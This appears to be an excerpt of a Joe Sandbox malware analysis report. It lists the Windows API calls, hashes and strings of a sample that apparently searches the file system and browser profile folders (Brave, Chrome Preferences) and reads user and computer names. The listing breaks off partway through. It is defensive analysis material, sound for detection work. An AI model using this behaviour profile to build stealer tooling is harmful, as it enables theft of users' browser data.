                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction ID: ce57d29500d96b33ae73fd294b2d0a5fe4e8542c7741799118836566479eeeda
                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction Fuzzy Hash: 49D01232645228B7DB003A94DC09BCEBF5CDF09BA2F008461FB0DE9080CBB09A4046EA
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 2087232378-0
                                                                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                                                  APIs
                                                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                  • String ID:
                                                                                  • API String ID: 1004333139-0
                                                                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008D9C56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8d9000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction ID: 6ab206784547c052e88c169eb5bf572d42f3064b52d803a340ea844e73fb3fbc
                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction Fuzzy Hash: 61113C79A00208EFDB01DF98CA85E98BBF5EF08351F058195F9889B362D775EA50DF90
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 004138CC
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                  • API String ID: 1125553467-817767981
                                                                                  • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                                                  • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                  • API String ID: 3334442632-726946144
                                                                                  • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                                                  • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 0041492C
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                  • API String ID: 180737720-445461498
                                                                                  • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                                                  • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00B13B33
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B13B4A
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B13B9C
                                                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00B13BAE
                                                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 00B13BC4
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B13ECE
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B13EE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1125553467-0
                                                                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                                                  • Instruction ID: ffba857d1c798b2ec2c7b480b358723ee74eccd0aa46dc6fa2e8b2a256de3e53
                                                                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                                                  • Instruction Fuzzy Hash: 9CA171B6A40218ABDB34DFA4CC85FEE73B9FB49700F4445C8A50D96181EB759B84CF62
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                                                  • wsprintfA.USER32 ref: 004145A6
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                                                  • lstrcatA.KERNEL32(?,00906250,?,00000104), ref: 004146C5
                                                                                  • lstrcatA.KERNEL32(?,0090A150), ref: 004146D8
                                                                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                                                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                  • String ID: %s\%s$%s\*
                                                                                  • API String ID: 13328894-2848263008
                                                                                  • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                                                  • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 00B0C15C
                                                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 00B0C1B4
                                                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 00B0C1CA
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0CA26
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0CA38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                                                  • Instruction ID: bcad225375d4edbb1cee6f105564f96f133e5f74665f9b4fe01d46203b668b26
                                                                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                                                  • Instruction Fuzzy Hash: A64223729111049BCB18FBA0DD96EED77B9AF54300F8045DCB50AA6191EF34AF88CB92
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00413EC3
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID: %s\%s
                                                                                  • API String ID: 180737720-4073750446
                                                                                  • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                                                  • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B147E7
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B147EE
                                                                                  • wsprintfA.USER32 ref: 00B1480D
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B14824
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00B14852
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00B14868
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B148F2
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B14907
                                                                                  • lstrcat.KERNEL32(?,0064A524), ref: 00B1492C
                                                                                  • lstrcat.KERNEL32(?,0064A22C), ref: 00B1493F
                                                                                  • lstrlen.KERNEL32(?), ref: 00B1494C
                                                                                  • lstrlen.KERNEL32(?), ref: 00B1495D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 671575355-0
                                                                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                                                  • Instruction ID: add04ca7891d0539342893374a2169aa435a02c869187e572cee219304b3d1a5
                                                                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                                                  • Instruction Fuzzy Hash: 895163B5580218ABCB24EBB0DD89FEE77BDEB58700F4045D8B60992190EB759BC4CF91
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00B1412A
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B14141
                                                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B1416F
                                                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B14185
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B142D3
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B142E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 180737720-0
                                                                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                                                  • Instruction ID: b6259c50529b8a62591d1782dbde16c6c18d65cd3fc772beb9ffac547231c1c3
                                                                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                                                  • Instruction Fuzzy Hash: 535163B5940218BBCB24FBB0DD85EEA77BDFB54300F4045C9B64992080DB75ABC58F95
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 0040ED3E
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID: %s\*.*
                                                                                  • API String ID: 180737720-1013718255
                                                                                  • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                                                  • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                  • String ID: 4@$\*.*
                                                                                  • API String ID: 2325840235-1993203227
                                                                                  • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                                                  • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
